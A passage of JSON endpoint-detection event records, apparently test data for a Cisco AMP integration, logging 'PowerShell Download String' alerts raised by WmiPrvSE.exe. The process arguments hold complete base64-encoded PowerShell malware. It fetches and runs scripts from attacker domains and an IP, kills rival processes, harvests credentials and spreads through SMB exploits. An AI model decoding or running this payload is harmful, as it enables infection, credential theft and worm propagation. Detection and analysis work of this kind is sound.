3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20200719101800,"sig_rev":1},"detection":"apde:20200719101800","end_ts":1610640884,"engine":"apde","id":"cF3A8bacac","name":"PowerShell Download String","observables":{"file":[{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1},{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1}]},"remediated":false,"severity":"medium","silent":true,"start_ts":1610640884,"tactics":["TA0002","TA0005"],"techniques":["T1059"],"type":"activity","normalized":{"observables":{"file":{"name":["wmiprvse.exe","powershell.exe"],"path":["c:\\windows\\system32\\wbem","c:\\windows\\system32\\windowspowershell\\v1.0"]}},"name":"powershell download string"},"ts":1610640884},"tactics":["TA0002","TA0005"],"techniques":["T1059"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":791000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"PowerShell Download String","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsA